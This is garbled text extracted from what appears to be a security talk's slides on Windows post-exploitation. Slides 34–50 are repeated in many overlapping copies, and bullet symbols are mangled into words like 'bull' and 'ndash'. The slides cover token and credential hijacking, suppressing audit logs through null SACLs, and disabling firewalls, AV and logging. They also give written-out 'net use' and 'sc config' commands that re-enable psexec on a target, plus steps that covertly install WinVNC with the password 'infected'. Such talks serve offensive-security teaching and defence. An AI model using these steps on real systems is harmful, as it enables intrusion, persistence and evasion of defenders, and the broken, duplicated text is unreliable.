bull Enumerate hijack tokensndash FUFUTO

bull Enable SYSTEM privilegesbull Change process privileges DKOM

ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials

Slide 43

User Identity Theft

Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My

bull What we wantndash Privileges or SIDrsquos

bull What we getndash Access Access Access

bull How we get itndash Incognito vs FUto

Slide 44

bull DEMOS

Slide 45

Feature Modification

Slide 46

Feature Modification

bull Changing existing features or settings to benefit our activities

bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access

software

Slide 47

Feature Modification

bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly

bull Not just through existing toolsndash Stealth Persistence requirements

bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement

Slide 48

Feature Modification

bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)

bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)

bull Turning off or adding exceptions to security softwarendash Firewalls AV logging

bull Modifying Local Security Policies

Slide 49

Feature Modification

bull Enabling psexecndash Psexec was great awesome remote

shellcommand toolndash Everybody now disables clipbook which

psexec requires l4m3 ndash Lets re-enable it

Slide 50

Feature Modification

bull Enabling psexecbull Use the system control tool scexe

ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv

Slide 34

Stealth Evading Detection

bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption

bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics

bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research

Slide 35

Stealth Evading Detection

bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight

bull Many tools have ONLY malicious usesbull Make your intent hard to determine

ndash Be noisy on one to divert attention from another

Slide 36

Stealth Evading Detection

bull Different Perspectivendash Know the targets environment better than

they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal

behavior

ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious

Slide 37

Stealth Evading Detection

bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs

Slide 38

bull DEMOSndash Kaspersky squeals like a pig

Slide 39

User Identity Theft

Slide 40

User Identity Theft

bull Itrsquos not always about ROOTbull Look like someone else

ndash Use the credentials access of another userbull Goals

ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior

Slide 41

User Identity Theft

bull Stages and techniquesndash Target users

bull Who has access to whatbull Where is the data

ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens

ndash Access is the end goal be it data or another system

Slide 42

User Identity Theft

bull Existing toolsndash Incognito (metasploit)

bull Enumerate hijack tokensndash FUFUTO

bull Enable SYSTEM privilegesbull Change process privileges DKOM

ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials

Slide 43

User Identity Theft

Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My

bull What we wantndash Privileges or SIDrsquos

bull What we getndash Access Access Access

bull How we get itndash Incognito vs FUto

Slide 44

bull DEMOS

Slide 45

Feature Modification

Slide 46

Feature Modification

bull Changing existing features or settings to benefit our activities

bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access

software

Slide 47

Feature Modification

bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly

bull Not just through existing toolsndash Stealth Persistence requirements

bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement

Slide 48

Feature Modification

bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)

bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)

bull Turning off or adding exceptions to security softwarendash Firewalls AV logging

bull Modifying Local Security Policies

Slide 49

Feature Modification

bull Enabling psexecndash Psexec was great awesome remote

shellcommand toolndash Everybody now disables clipbook which

psexec requires l4m3 ndash Lets re-enable it

Slide 50

Feature Modification

bull Enabling psexecbull Use the system control tool scexe

ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv

Slide 35

Stealth Evading Detection

bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight

bull Many tools have ONLY malicious usesbull Make your intent hard to determine

ndash Be noisy on one to divert attention from another

Slide 36

Stealth Evading Detection

bull Different Perspectivendash Know the targets environment better than

they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal

behavior

ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious

Slide 37

Stealth Evading Detection

bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs

Slide 38

bull DEMOSndash Kaspersky squeals like a pig

Slide 39

User Identity Theft

Slide 40

User Identity Theft

bull Itrsquos not always about ROOTbull Look like someone else

ndash Use the credentials access of another userbull Goals

ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior

Slide 41

User Identity Theft

bull Stages and techniquesndash Target users

bull Who has access to whatbull Where is the data

ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens

ndash Access is the end goal be it data or another system

Slide 42

User Identity Theft

bull Existing toolsndash Incognito (metasploit)

bull Enumerate hijack tokensndash FUFUTO

bull Enable SYSTEM privilegesbull Change process privileges DKOM

ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials

Slide 43

User Identity Theft

Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My

bull What we wantndash Privileges or SIDrsquos

bull What we getndash Access Access Access

bull How we get itndash Incognito vs FUto

Slide 44

bull DEMOS

Slide 45

Feature Modification

Slide 46

Feature Modification

bull Changing existing features or settings to benefit our activities

bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access

software

Slide 47

Feature Modification

bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly

bull Not just through existing toolsndash Stealth Persistence requirements

bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement

Slide 48

Feature Modification

bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)

bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)

bull Turning off or adding exceptions to security softwarendash Firewalls AV logging

bull Modifying Local Security Policies

Slide 49

Feature Modification

bull Enabling psexecndash Psexec was great awesome remote

shellcommand toolndash Everybody now disables clipbook which

psexec requires l4m3 ndash Lets re-enable it

Slide 50

Feature Modification

bull Enabling psexecbull Use the system control tool scexe

ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv

Slide 36

Stealth Evading Detection

bull Different Perspectivendash Know the targets environment better than

they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal

behavior

ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious

Slide 37

Stealth Evading Detection

bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs

Slide 38

bull DEMOSndash Kaspersky squeals like a pig

Slide 39

User Identity Theft

Slide 40

User Identity Theft

bull Itrsquos not always about ROOTbull Look like someone else

ndash Use the credentials access of another userbull Goals

ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior

Slide 41

User Identity Theft

bull Stages and techniquesndash Target users

bull Who has access to whatbull Where is the data

ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens

ndash Access is the end goal be it data or another system

Slide 42

User Identity Theft

bull Existing toolsndash Incognito (metasploit)

bull Enumerate hijack tokensndash FUFUTO

bull Enable SYSTEM privilegesbull Change process privileges DKOM

ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials

Slide 43

User Identity Theft

Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My

bull What we wantndash Privileges or SIDrsquos

bull What we getndash Access Access Access

bull How we get itndash Incognito vs FUto

Slide 44

bull DEMOS

Slide 45

Feature Modification

Slide 46

Feature Modification

bull Changing existing features or settings to benefit our activities

bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access

software

Slide 47

Feature Modification

bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly

bull Not just through existing toolsndash Stealth Persistence requirements

bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement

Slide 48

Feature Modification

bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)

bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)

bull Turning off or adding exceptions to security softwarendash Firewalls AV logging

bull Modifying Local Security Policies

Slide 49

Feature Modification

bull Enabling psexecndash Psexec was great awesome remote

shellcommand toolndash Everybody now disables clipbook which

psexec requires l4m3 ndash Lets re-enable it

Slide 50

Feature Modification

bull Enabling psexecbull Use the system control tool scexe

ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv

Slide 37

Stealth Evading Detection

bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs

Slide 38

bull DEMOSndash Kaspersky squeals like a pig

Slide 39

User Identity Theft

Slide 40

User Identity Theft

bull Itrsquos not always about ROOTbull Look like someone else

ndash Use the credentials access of another userbull Goals

ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior

Slide 41

User Identity Theft

bull Stages and techniquesndash Target users

bull Who has access to whatbull Where is the data

ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens

ndash Access is the end goal be it data or another system

Slide 42

User Identity Theft

bull Existing toolsndash Incognito (metasploit)

bull Enumerate hijack tokensndash FUFUTO

bull Enable SYSTEM privilegesbull Change process privileges DKOM

ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials

Slide 43

User Identity Theft

Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My

bull What we wantndash Privileges or SIDrsquos

bull What we getndash Access Access Access

bull How we get itndash Incognito vs FUto

Slide 44

bull DEMOS

Slide 45

Feature Modification

Slide 46

Feature Modification

bull Changing existing features or settings to benefit our activities

bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access

software

Slide 47

Feature Modification

bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly

bull Not just through existing toolsndash Stealth Persistence requirements

bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement

Slide 48

Feature Modification

bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)

bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)

bull Turning off or adding exceptions to security softwarendash Firewalls AV logging

bull Modifying Local Security Policies

Slide 49

Feature Modification

bull Enabling psexecndash Psexec was great awesome remote

shellcommand toolndash Everybody now disables clipbook which

psexec requires l4m3 ndash Lets re-enable it

Slide 50

Feature Modification

bull Enabling psexecbull Use the system control tool scexe

ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv

Slide 38

bull DEMOSndash Kaspersky squeals like a pig

Slide 39

User Identity Theft

Slide 40

User Identity Theft

bull Itrsquos not always about ROOTbull Look like someone else

ndash Use the credentials access of another userbull Goals

ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior

Slide 41

User Identity Theft

bull Stages and techniquesndash Target users

bull Who has access to whatbull Where is the data

ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens

ndash Access is the end goal be it data or another system

Slide 42

User Identity Theft

bull Existing toolsndash Incognito (metasploit)

bull Enumerate hijack tokensndash FUFUTO

bull Enable SYSTEM privilegesbull Change process privileges DKOM

ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials

Slide 43

User Identity Theft

Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My

bull What we wantndash Privileges or SIDrsquos

bull What we getndash Access Access Access

bull How we get itndash Incognito vs FUto

Slide 44

bull DEMOS

Slide 45

Feature Modification

Slide 46

Feature Modification

bull Changing existing features or settings to benefit our activities

bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access

software

Slide 47

Feature Modification

bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly

bull Not just through existing toolsndash Stealth Persistence requirements

bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement

Slide 48

Feature Modification

bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)

bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)

bull Turning off or adding exceptions to security softwarendash Firewalls AV logging

bull Modifying Local Security Policies

Slide 49

Feature Modification

bull Enabling psexecndash Psexec was great awesome remote

shellcommand toolndash Everybody now disables clipbook which

psexec requires l4m3 ndash Lets re-enable it

Slide 50

Feature Modification

bull Enabling psexecbull Use the system control tool scexe

ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv

Slide 39

User Identity Theft

Slide 40

User Identity Theft

bull Itrsquos not always about ROOTbull Look like someone else

ndash Use the credentials access of another userbull Goals

ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior

Slide 41

User Identity Theft

bull Stages and techniquesndash Target users

bull Who has access to whatbull Where is the data

ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens

ndash Access is the end goal be it data or another system

Slide 42

User Identity Theft

bull Existing toolsndash Incognito (metasploit)

bull Enumerate hijack tokensndash FUFUTO

bull Enable SYSTEM privilegesbull Change process privileges DKOM

ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials

Slide 43

User Identity Theft

Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My

bull What we wantndash Privileges or SIDrsquos

bull What we getndash Access Access Access

bull How we get itndash Incognito vs FUto

Slide 44

bull DEMOS

Slide 45

Feature Modification

Slide 46

Feature Modification

bull Changing existing features or settings to benefit our activities

bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access

software

Slide 47

Feature Modification

bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly

bull Not just through existing toolsndash Stealth Persistence requirements

bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement

Slide 48

Feature Modification

bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)

bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)

bull Turning off or adding exceptions to security softwarendash Firewalls AV logging

bull Modifying Local Security Policies

Slide 49

Feature Modification

bull Enabling psexecndash Psexec was great awesome remote

shellcommand toolndash Everybody now disables clipbook which

psexec requires l4m3 ndash Lets re-enable it

Slide 50

Feature Modification

bull Enabling psexecbull Use the system control tool scexe

ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv

Slide 40

User Identity Theft

bull Itrsquos not always about ROOTbull Look like someone else

ndash Use the credentials access of another userbull Goals

ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior

Slide 41

User Identity Theft

bull Stages and techniquesndash Target users

bull Who has access to whatbull Where is the data

ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens

ndash Access is the end goal be it data or another system

Slide 42

User Identity Theft

bull Existing toolsndash Incognito (metasploit)

bull Enumerate hijack tokensndash FUFUTO

bull Enable SYSTEM privilegesbull Change process privileges DKOM

ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials

Slide 43

User Identity Theft

Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My

bull What we wantndash Privileges or SIDrsquos

bull What we getndash Access Access Access

bull How we get itndash Incognito vs FUto

Slide 44

bull DEMOS

Slide 45

Feature Modification

Slide 46

Feature Modification

bull Changing existing features or settings to benefit our activities

bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access

software

Slide 47

Feature Modification

bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly

bull Not just through existing toolsndash Stealth Persistence requirements

bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement

Slide 48

Feature Modification

bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)

bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)

bull Turning off or adding exceptions to security softwarendash Firewalls AV logging

bull Modifying Local Security Policies

Slide 49

Feature Modification

bull Enabling psexecndash Psexec was great awesome remote

shellcommand toolndash Everybody now disables clipbook which

psexec requires l4m3 ndash Lets re-enable it

Slide 50

Feature Modification

bull Enabling psexecbull Use the system control tool scexe

ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv

Slide 41

User Identity Theft

bull Stages and techniquesndash Target users

bull Who has access to whatbull Where is the data

ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens

ndash Access is the end goal be it data or another system

Slide 42

User Identity Theft

bull Existing toolsndash Incognito (metasploit)

bull Enumerate hijack tokensndash FUFUTO

bull Enable SYSTEM privilegesbull Change process privileges DKOM

ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials

Slide 43

User Identity Theft

Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My

bull What we wantndash Privileges or SIDrsquos

bull What we getndash Access Access Access

bull How we get itndash Incognito vs FUto

Slide 44

bull DEMOS

Slide 45

Feature Modification

Slide 46

Feature Modification

bull Changing existing features or settings to benefit our activities

bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access

software

Slide 47

Feature Modification

bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly

bull Not just through existing toolsndash Stealth Persistence requirements

bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement

Slide 48

Feature Modification

bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)

bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)

bull Turning off or adding exceptions to security softwarendash Firewalls AV logging

bull Modifying Local Security Policies

Slide 49

Feature Modification

bull Enabling psexecndash Psexec was great awesome remote

shellcommand toolndash Everybody now disables clipbook which

psexec requires l4m3 ndash Lets re-enable it

Slide 50

Feature Modification

bull Enabling psexecbull Use the system control tool scexe

ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv

Slide 42

User Identity Theft

bull Existing toolsndash Incognito (metasploit)

bull Enumerate hijack tokensndash FUFUTO

bull Enable SYSTEM privilegesbull Change process privileges DKOM

ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials

Slide 43

User Identity Theft

Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My

bull What we wantndash Privileges or SIDrsquos

bull What we getndash Access Access Access

bull How we get itndash Incognito vs FUto

Slide 44

bull DEMOS

Slide 45

Feature Modification

Slide 46

Feature Modification

bull Changing existing features or settings to benefit our activities

bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access

software

Slide 47

Feature Modification

bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly

bull Not just through existing toolsndash Stealth Persistence requirements

bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement

Slide 48

Feature Modification

bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)

bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)

bull Turning off or adding exceptions to security softwarendash Firewalls AV logging

bull Modifying Local Security Policies

Slide 49

Feature Modification

bull Enabling psexecndash Psexec was great awesome remote

shellcommand toolndash Everybody now disables clipbook which

psexec requires l4m3 ndash Lets re-enable it

Slide 50

Feature Modification

bull Enabling psexecbull Use the system control tool scexe

ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv

Slide 43

User Identity Theft

Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My

bull What we wantndash Privileges or SIDrsquos

bull What we getndash Access Access Access

bull How we get itndash Incognito vs FUto

Slide 44

bull DEMOS

Slide 45

Feature Modification

Slide 46

Feature Modification

bull Changing existing features or settings to benefit our activities

bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access

software

Slide 47

Feature Modification

bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly

bull Not just through existing toolsndash Stealth Persistence requirements

bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement

Slide 48

Feature Modification

bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)

bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)

bull Turning off or adding exceptions to security softwarendash Firewalls AV logging

bull Modifying Local Security Policies

Slide 49

Feature Modification

bull Enabling psexecndash Psexec was great awesome remote

shellcommand toolndash Everybody now disables clipbook which

psexec requires l4m3 ndash Lets re-enable it

Slide 50

Feature Modification

bull Enabling psexecbull Use the system control tool scexe

ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv

Slide 44

bull DEMOS

Slide 45

Feature Modification

Slide 46

Feature Modification

bull Changing existing features or settings to benefit our activities

bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access

software

Slide 47

Feature Modification

bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly

bull Not just through existing toolsndash Stealth Persistence requirements

bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement

Slide 48

Feature Modification

bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)

bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)

bull Turning off or adding exceptions to security softwarendash Firewalls AV logging

bull Modifying Local Security Policies

Slide 49

Feature Modification

bull Enabling psexecndash Psexec was great awesome remote

shellcommand toolndash Everybody now disables clipbook which

psexec requires l4m3 ndash Lets re-enable it

Slide 50

Feature Modification

bull Enabling psexecbull Use the system control tool scexe

ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv

Slide 45

Feature Modification

Slide 46

Feature Modification

bull Changing existing features or settings to benefit our activities

bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access

software

Slide 47

Feature Modification

bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly

bull Not just through existing toolsndash Stealth Persistence requirements

bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement

Slide 48

Feature Modification

bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)

bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)

bull Turning off or adding exceptions to security softwarendash Firewalls AV logging

bull Modifying Local Security Policies

Slide 49

Feature Modification

bull Enabling psexecndash Psexec was great awesome remote

shellcommand toolndash Everybody now disables clipbook which

psexec requires l4m3 ndash Lets re-enable it

Slide 50

Feature Modification

bull Enabling psexecbull Use the system control tool scexe

ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv

Slide 46

Feature Modification

bull Changing existing features or settings to benefit our activities

bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access

software

Slide 47

Feature Modification

bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly

bull Not just through existing toolsndash Stealth Persistence requirements

bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement

Slide 48

Feature Modification

bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)

bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)

bull Turning off or adding exceptions to security softwarendash Firewalls AV logging

bull Modifying Local Security Policies

Slide 49

Feature Modification

bull Enabling psexecndash Psexec was great awesome remote

shellcommand toolndash Everybody now disables clipbook which

psexec requires l4m3 ndash Lets re-enable it

Slide 50

Feature Modification

bull Enabling psexecbull Use the system control tool scexe

ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv

Slide 47

Feature Modification

bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly

bull Not just through existing toolsndash Stealth Persistence requirements

bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement

Slide 48

Feature Modification

bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)

bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)

bull Turning off or adding exceptions to security softwarendash Firewalls AV logging

bull Modifying Local Security Policies

Slide 49

Feature Modification

bull Enabling psexecndash Psexec was great awesome remote

shellcommand toolndash Everybody now disables clipbook which

psexec requires l4m3 ndash Lets re-enable it

Slide 50

Feature Modification

bull Enabling psexecbull Use the system control tool scexe

ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv

Slide 48

Feature Modification

bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)

bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)

bull Turning off or adding exceptions to security softwarendash Firewalls AV logging

bull Modifying Local Security Policies

Slide 49

Feature Modification

bull Enabling psexecndash Psexec was great awesome remote

shellcommand toolndash Everybody now disables clipbook which

psexec requires l4m3 ndash Lets re-enable it

Slide 50

Feature Modification

bull Enabling psexecbull Use the system control tool scexe

ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv

Slide 49

Feature Modification

bull Enabling psexecndash Psexec was great awesome remote

shellcommand toolndash Everybody now disables clipbook which

psexec requires l4m3 ndash Lets re-enable it

Slide 50

Feature Modification

bull Enabling psexecbull Use the system control tool scexe

ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv

Slide 50

Feature Modification

bull Enabling psexecbull Use the system control tool scexe

ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv

Slide 51

Feature Modification bull Enabling VNC (from command line)

ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder

bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll

ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo

Vncreg file contents

